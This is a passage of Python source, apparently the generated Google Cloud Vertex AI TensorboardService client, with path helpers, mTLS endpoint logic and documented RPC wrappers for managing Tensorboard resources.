from google.protobuf import empty_pb2 # type: ignore
from google.protobuf import field_mask_pb2 # type: ignore
from google.protobuf import timestamp_pb2 # type: ignore
from .transports.base import TensorboardServiceTransport, DEFAULT_CLIENT_INFO
from .transports.grpc import TensorboardServiceGrpcTransport
from .transports.grpc_asyncio import TensorboardServiceGrpcAsyncIOTransport
class TensorboardServiceClientMeta(type):
"""Metaclass for the TensorboardService client.
This provides class-level methods for building and retrieving
support objects (e.g. transport) without polluting the client instance
objects.
"""
_transport_registry = (
OrderedDict()
) # type: Dict[str, Type[TensorboardServiceTransport]]
_transport_registry["grpc"] = TensorboardServiceGrpcTransport
_transport_registry["grpc_asyncio"] = TensorboardServiceGrpcAsyncIOTransport
def get_transport_class(
cls,
label: Optional[str] = None,
) -> Type[TensorboardServiceTransport]:
"""Returns an appropriate transport class.
Args:
label: The name of the desired transport. If none is
provided, then the first transport in the registry is used.
Returns:
The transport class to use.
"""
# If a specific transport is requested, return that one.
if label:
return cls._transport_registry[label]
# No transport is requested; return the default (that is, the first one
# in the dictionary).
return next(iter(cls._transport_registry.values()))
class TensorboardServiceClient(metaclass=TensorboardServiceClientMeta):
"""TensorboardService"""
@staticmethod
def _get_default_mtls_endpoint(api_endpoint):
"""Converts api endpoint to mTLS endpoint.
Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to
"*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively.
Args:
api_endpoint (Optional[str]): the api endpoint to convert.
Returns:
str: converted mTLS api endpoint.
"""
if not api_endpoint:
return api_endpoint
mtls_endpoint_re = re.compile(
r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?"
)
m = mtls_endpoint_re.match(api_endpoint)
name, mtls, sandbox, googledomain = m.groups()
if mtls or not googledomain:
return api_endpoint
if sandbox:
return api_endpoint.replace(
"sandbox.googleapis.com", "mtls.sandbox.googleapis.com"
)
return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com")
DEFAULT_ENDPOINT = "aiplatform.googleapis.com"
DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore
DEFAULT_ENDPOINT
)
@classmethod
def from_service_account_info(cls, info: dict, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
info.
Args:
info (dict): The service account private key info.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TensorboardServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_info(info)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
@classmethod
def from_service_account_file(cls, filename: str, *args, **kwargs):
"""Creates an instance of this client using the provided credentials
file.
Args:
filename (str): The path to the service account private key json
file.
args: Additional arguments to pass to the constructor.
kwargs: Additional arguments to pass to the constructor.
Returns:
TensorboardServiceClient: The constructed client.
"""
credentials = service_account.Credentials.from_service_account_file(filename)
kwargs["credentials"] = credentials
return cls(*args, **kwargs)
from_service_account_json = from_service_account_file
@property
def transport(self) -> TensorboardServiceTransport:
"""Returns the transport used by the client instance.
Returns:
TensorboardServiceTransport: The transport used by the client
instance.
"""
return self._transport
@staticmethod
def tensorboard_path(
project: str,
location: str,
tensorboard: str,
) -> str:
"""Returns a fully-qualified tensorboard string."""
return (
"projects/{project}/locations/{location}/tensorboards/{tensorboard}".format(
project=project,
location=location,
tensorboard=tensorboard,
)
)
@staticmethod
def parse_tensorboard_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def tensorboard_experiment_path(
project: str,
location: str,
tensorboard: str,
experiment: str,
) -> str:
"""Returns a fully-qualified tensorboard_experiment string."""
return "projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}".format(
project=project,
location=location,
tensorboard=tensorboard,
experiment=experiment,
)
@staticmethod
def parse_tensorboard_experiment_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard_experiment path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)/experiments/(?P<experiment>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def tensorboard_run_path(
project: str,
location: str,
tensorboard: str,
experiment: str,
run: str,
) -> str:
"""Returns a fully-qualified tensorboard_run string."""
return "projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}".format(
project=project,
location=location,
tensorboard=tensorboard,
experiment=experiment,
run=run,
)
@staticmethod
def parse_tensorboard_run_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard_run path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)/experiments/(?P<experiment>.+?)/runs/(?P<run>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def tensorboard_time_series_path(
project: str,
location: str,
tensorboard: str,
experiment: str,
run: str,
time_series: str,
) -> str:
"""Returns a fully-qualified tensorboard_time_series string."""
return "projects/{project}/locations/{location}/tensorboards/{tensorboard}/experiments/{experiment}/runs/{run}/timeSeries/{time_series}".format(
project=project,
location=location,
tensorboard=tensorboard,
experiment=experiment,
run=run,
time_series=time_series,
)
@staticmethod
def parse_tensorboard_time_series_path(path: str) -> Dict[str, str]:
"""Parses a tensorboard_time_series path into its component segments."""
m = re.match(
r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)/tensorboards/(?P<tensorboard>.+?)/experiments/(?P<experiment>.+?)/runs/(?P<run>.+?)/timeSeries/(?P<time_series>.+?)$",
path,
)
return m.groupdict() if m else {}
@staticmethod
def common_billing_account_path(
billing_account: str,
) -> str:
"""Returns a fully-qualified billing_account string."""
return "billingAccounts/{billing_account}".format(
billing_account=billing_account,
)
@staticmethod
def parse_common_billing_account_path(path: str) -> Dict[str, str]:
"""Parse a billing_account path into its component segments."""
m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_folder_path(
folder: str,
) -> str:
"""Returns a fully-qualified folder string."""
return "folders/{folder}".format(
folder=folder,
)
@staticmethod
def parse_common_folder_path(path: str) -> Dict[str, str]:
"""Parse a folder path into its component segments."""
m = re.match(r"^folders/(?P<folder>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_organization_path(
organization: str,
) -> str:
"""Returns a fully-qualified organization string."""
return "organizations/{organization}".format(
organization=organization,
)
@staticmethod
def parse_common_organization_path(path: str) -> Dict[str, str]:
"""Parse a organization path into its component segments."""
m = re.match(r"^organizations/(?P<organization>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_project_path(
project: str,
) -> str:
"""Returns a fully-qualified project string."""
return "projects/{project}".format(
project=project,
)
@staticmethod
def parse_common_project_path(path: str) -> Dict[str, str]:
"""Parse a project path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)$", path)
return m.groupdict() if m else {}
@staticmethod
def common_location_path(
project: str,
location: str,
) -> str:
"""Returns a fully-qualified location string."""
return "projects/{project}/locations/{location}".format(
project=project,
location=location,
)
@staticmethod
def parse_common_location_path(path: str) -> Dict[str, str]:
"""Parse a location path into its component segments."""
m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path)
return m.groupdict() if m else {}
@classmethod
def get_mtls_endpoint_and_cert_source(
cls, client_options: Optional[client_options_lib.ClientOptions] = None
):
"""Return the API endpoint and client cert source for mutual TLS.
The client cert source is determined in the following order:
(1) if `GOOGLE_API_USE_CLIENT_CERTIFICATE` environment variable is not "true", the
client cert source is None.
(2) if `client_options.client_cert_source` is provided, use the provided one; if the
default client cert source exists, use the default one; otherwise the client cert
source is None.
The API endpoint is determined in the following order:
        (1) if `client_options.api_endpoint` is provided, use the provided one.
        (2) if the `GOOGLE_API_USE_MTLS_ENDPOINT` environment variable is "always", use the
default mTLS endpoint; if the environment variable is "never", use the default API
endpoint; otherwise if client cert source exists, use the default mTLS endpoint, otherwise
use the default API endpoint.
More details can be found at https://google.aip.dev/auth/4114.
Args:
client_options (google.api_core.client_options.ClientOptions): Custom options for the
client. Only the `api_endpoint` and `client_cert_source` properties may be used
in this method.
Returns:
Tuple[str, Callable[[], Tuple[bytes, bytes]]]: returns the API endpoint and the
client cert source to use.
Raises:
google.auth.exceptions.MutualTLSChannelError: If any errors happen.
"""
if client_options is None:
client_options = client_options_lib.ClientOptions()
use_client_cert = os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false")
use_mtls_endpoint = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto")
if use_client_cert not in ("true", "false"):
raise ValueError(
"Environment variable `GOOGLE_API_USE_CLIENT_CERTIFICATE` must be either `true` or `false`"
)
if use_mtls_endpoint not in ("auto", "never", "always"):
raise MutualTLSChannelError(
"Environment variable `GOOGLE_API_USE_MTLS_ENDPOINT` must be `never`, `auto` or `always`"
)
# Figure out the client cert source to use.
client_cert_source = None
if use_client_cert == "true":
if client_options.client_cert_source:
client_cert_source = client_options.client_cert_source
elif mtls.has_default_client_cert_source():
client_cert_source = mtls.default_client_cert_source()
# Figure out which api endpoint to use.
if client_options.api_endpoint is not None:
api_endpoint = client_options.api_endpoint
elif use_mtls_endpoint == "always" or (
use_mtls_endpoint == "auto" and client_cert_source
):
api_endpoint = cls.DEFAULT_MTLS_ENDPOINT
else:
api_endpoint = cls.DEFAULT_ENDPOINT
return api_endpoint, client_cert_source
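    # Added illustration (comment only, not from the generated source): with
    # GOOGLE_API_USE_CLIENT_CERTIFICATE="true" and a default client certificate
    # available, GOOGLE_API_USE_MTLS_ENDPOINT="auto" resolves the endpoint above
    # to DEFAULT_MTLS_ENDPOINT ("aiplatform.mtls.googleapis.com"); with it set
    # to "never", or when no certificate is found under "auto", the plain
    # DEFAULT_ENDPOINT ("aiplatform.googleapis.com") is returned instead.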
def __init__(
self,
*,
credentials: Optional[ga_credentials.Credentials] = None,
transport: Optional[Union[str, TensorboardServiceTransport]] = None,
client_options: Optional[Union[client_options_lib.ClientOptions, dict]] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiates the tensorboard service client.
Args:
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
transport (Union[str, TensorboardServiceTransport]): The
transport to use. If set to None, a transport is chosen
automatically.
client_options (Optional[Union[google.api_core.client_options.ClientOptions, dict]]): Custom options for the
client. It won't take effect if a ``transport`` instance is provided.
(1) The ``api_endpoint`` property can be used to override the
default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT
environment variable can also be used to override the endpoint:
"always" (always use the default mTLS endpoint), "never" (always
use the default regular endpoint) and "auto" (auto switch to the
default mTLS endpoint if client certificate is present, this is
the default value). However, the ``api_endpoint`` property takes
precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
if isinstance(client_options, dict):
client_options = client_options_lib.from_dict(client_options)
if client_options is None:
client_options = client_options_lib.ClientOptions()
client_options = cast(client_options_lib.ClientOptions, client_options)
api_endpoint, client_cert_source_func = self.get_mtls_endpoint_and_cert_source(
client_options
)
api_key_value = getattr(client_options, "api_key", None)
if api_key_value and credentials:
raise ValueError(
"client_options.api_key and credentials are mutually exclusive"
)
# Save or instantiate the transport.
# Ordinarily, we provide the transport, but allowing a custom transport
# instance provides an extensibility point for unusual situations.
if isinstance(transport, TensorboardServiceTransport):
# transport is a TensorboardServiceTransport instance.
if credentials or client_options.credentials_file or api_key_value:
raise ValueError(
"When providing a transport instance, "
"provide its credentials directly."
)
if client_options.scopes:
raise ValueError(
"When providing a transport instance, provide its scopes "
"directly."
)
self._transport = transport
else:
import google.auth._default # type: ignore
if api_key_value and hasattr(
google.auth._default, "get_api_key_credentials"
):
credentials = google.auth._default.get_api_key_credentials(
api_key_value
)
Transport = type(self).get_transport_class(transport)
self._transport = Transport(
credentials=credentials,
credentials_file=client_options.credentials_file,
host=api_endpoint,
scopes=client_options.scopes,
client_cert_source_for_mtls=client_cert_source_func,
quota_project_id=client_options.quota_project_id,
client_info=client_info,
always_use_jwt_access=True,
api_audience=client_options.api_audience,
)
def create_tensorboard(
self,
request: Optional[
Union[tensorboard_service.CreateTensorboardRequest, dict]
] = None,
*,
parent: Optional[str] = None,
tensorboard: Optional[gca_tensorboard.Tensorboard] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Creates a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_create_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard = aiplatform_v1.Tensorboard()
tensorboard.display_name = "display_name_value"
request = aiplatform_v1.CreateTensorboardRequest(
parent="parent_value",
tensorboard=tensorboard,
)
# Make the request
operation = client.create_tensorboard(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.CreateTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.CreateTensorboard][google.cloud.aiplatform.v1.TensorboardService.CreateTensorboard].
parent (str):
Required. The resource name of the Location to create
the Tensorboard in. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
tensorboard (google.cloud.aiplatform_v1.types.Tensorboard):
Required. The Tensorboard to create.
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.Tensorboard` Tensorboard is a physical database that stores users' training metrics.
A default Tensorboard is provided in each region of a
Google Cloud project. If needed users can also create
extra Tensorboards in their projects.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, tensorboard])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.CreateTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.CreateTensorboardRequest):
request = tensorboard_service.CreateTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if tensorboard is not None:
request.tensorboard = tensorboard
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.create_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
gca_tensorboard.Tensorboard,
metadata_type=tensorboard_service.CreateTensorboardOperationMetadata,
)
# Done; return the response.
return response
def get_tensorboard(
self,
request: Optional[
Union[tensorboard_service.GetTensorboardRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard.Tensorboard:
r"""Gets a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_get_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.GetTensorboardRequest(
name="name_value",
)
# Make the request
response = client.get_tensorboard(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.GetTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.GetTensorboard][google.cloud.aiplatform.v1.TensorboardService.GetTensorboard].
name (str):
Required. The name of the Tensorboard resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.types.Tensorboard:
Tensorboard is a physical database
that stores users' training metrics. A
default Tensorboard is provided in each
region of a Google Cloud project. If
needed users can also create extra
Tensorboards in their projects.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.GetTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.GetTensorboardRequest):
request = tensorboard_service.GetTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.get_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
def update_tensorboard(
self,
request: Optional[
Union[tensorboard_service.UpdateTensorboardRequest, dict]
] = None,
*,
tensorboard: Optional[gca_tensorboard.Tensorboard] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Updates a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_update_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
tensorboard = aiplatform_v1.Tensorboard()
tensorboard.display_name = "display_name_value"
request = aiplatform_v1.UpdateTensorboardRequest(
tensorboard=tensorboard,
)
# Make the request
operation = client.update_tensorboard(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.UpdateTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.UpdateTensorboard][google.cloud.aiplatform.v1.TensorboardService.UpdateTensorboard].
tensorboard (google.cloud.aiplatform_v1.types.Tensorboard):
Required. The Tensorboard's ``name`` field is used to
identify the Tensorboard to be updated. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (google.protobuf.field_mask_pb2.FieldMask):
Required. Field mask is used to specify the fields to be
overwritten in the Tensorboard resource by the update.
The fields specified in the update_mask are relative to
the resource, not the full request. A field is
overwritten if it's in the mask. If the user does not
provide a mask then all fields are overwritten if new
values are specified.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1.types.Tensorboard` Tensorboard is a physical database that stores users' training metrics.
A default Tensorboard is provided in each region of a
Google Cloud project. If needed users can also create
extra Tensorboards in their projects.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([tensorboard, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.UpdateTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.UpdateTensorboardRequest):
request = tensorboard_service.UpdateTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if tensorboard is not None:
request.tensorboard = tensorboard
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.update_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("tensorboard.name", request.tensorboard.name),)
),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
gca_tensorboard.Tensorboard,
metadata_type=tensorboard_service.UpdateTensorboardOperationMetadata,
)
# Done; return the response.
return response
def list_tensorboards(
self,
request: Optional[
Union[tensorboard_service.ListTensorboardsRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListTensorboardsPager:
r"""Lists Tensorboards in a Location.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_list_tensorboards():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ListTensorboardsRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_tensorboards(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ListTensorboardsRequest, dict]):
The request object. Request message for
[TensorboardService.ListTensorboards][google.cloud.aiplatform.v1.TensorboardService.ListTensorboards].
parent (str):
Required. The resource name of the Location to list
Tensorboards. Format:
``projects/{project}/locations/{location}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1.services.tensorboard_service.pagers.ListTensorboardsPager:
Response message for
[TensorboardService.ListTensorboards][google.cloud.aiplatform.v1.TensorboardService.ListTensorboards].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.ListTensorboardsRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.ListTensorboardsRequest):
request = tensorboard_service.ListTensorboardsRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.list_tensorboards]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__iter__` convenience method.
response = pagers.ListTensorboardsPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
def delete_tensorboard(
self,
request: Optional[
Union[tensorboard_service.DeleteTensorboardRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gac_operation.Operation:
r"""Deletes a Tensorboard.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_delete_tensorboard():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.DeleteTensorboardRequest(
name="name_value",
)
# Make the request
operation = client.delete_tensorboard(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.DeleteTensorboardRequest, dict]):
The request object. Request message for
[TensorboardService.DeleteTensorboard][google.cloud.aiplatform.v1.TensorboardService.DeleteTensorboard].
name (str):
Required. The name of the Tensorboard to be deleted.
Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation.Operation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
# Minor optimization to avoid making a copy if the user passes
# in a tensorboard_service.DeleteTensorboardRequest.
# There's no risk of modifying the input as we've already verified
# there are no flattened fields.
if not isinstance(request, tensorboard_service.DeleteTensorboardRequest):
request = tensorboard_service.DeleteTensorboardRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = self._transport._wrapped_methods[self._transport.delete_tensorboard]
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = gac_operation.from_gapic(
response,
self._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
def read_tensorboard_usage(
self,
request: Optional[
Union[tensorboard_service.ReadTensorboardUsageRequest, dict]
] = None,
*,
tensorboard: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> tensorboard_service.ReadTensorboardUsageResponse:
r"""Returns a list of monthly active users for a given
TensorBoard instance.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1
def sample_read_tensorboard_usage():
# Create a client
client = aiplatform_v1.TensorboardServiceClient()
# Initialize request argument(s)
request = aiplatform_v1.ReadTensorboardUsageRequest(
tensorboard="tensorboard_value",
)
# Make the request
response = client.read_tensorboard_usage(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.aiplatform_v1.types.ReadTensorboardUsageRequest, dict]):
The request object. Request message for
[TensorboardService.ReadTensorboardUsage][google.cloud.aiplatform.v1.TensorboardService.ReadTensorboardUsage].
tensorboard (str):
Required. The name of the Tensorboard resource. Format:
``projects/{project}/locations/{location}/tensorboards/{tensorboard}``
This corresponds to the ``tensorboard`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
